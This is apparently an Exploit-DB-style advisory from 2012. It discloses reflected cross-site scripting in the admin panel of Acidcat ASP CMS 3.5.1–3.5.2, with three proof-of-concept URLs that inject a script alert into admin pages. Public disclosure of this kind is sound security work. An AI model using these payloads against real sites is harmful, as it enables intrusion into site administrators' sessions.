############################################################################################################### # Exploit Title: Acidcat ASP CMS v 3.5.1 - 3.5.2 Admin Panel - Reflected Cros Site-Scripting ( XSS ) # Script Page : http://www.acidcat.com # Date: 20-01-2012 # Author : RandomStorm - http://www.randomstorm.com # Avram Marius Gabriel (d3v1l) # Tested on: Windows XP & Vista (IE9) ############################################################################################################### # Cross-Site Scripting (XSS) # POC: # http://www.site.com/admin/admin_colors.asp?"><script>alert('XSS')</script> # http://www.site.com/admin/admin_config.asp?"><script>alert('XSS')</script> # http://www.site.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script> ################################################################################################################ # Works on Internet Explorer v.9 ################################################################################################################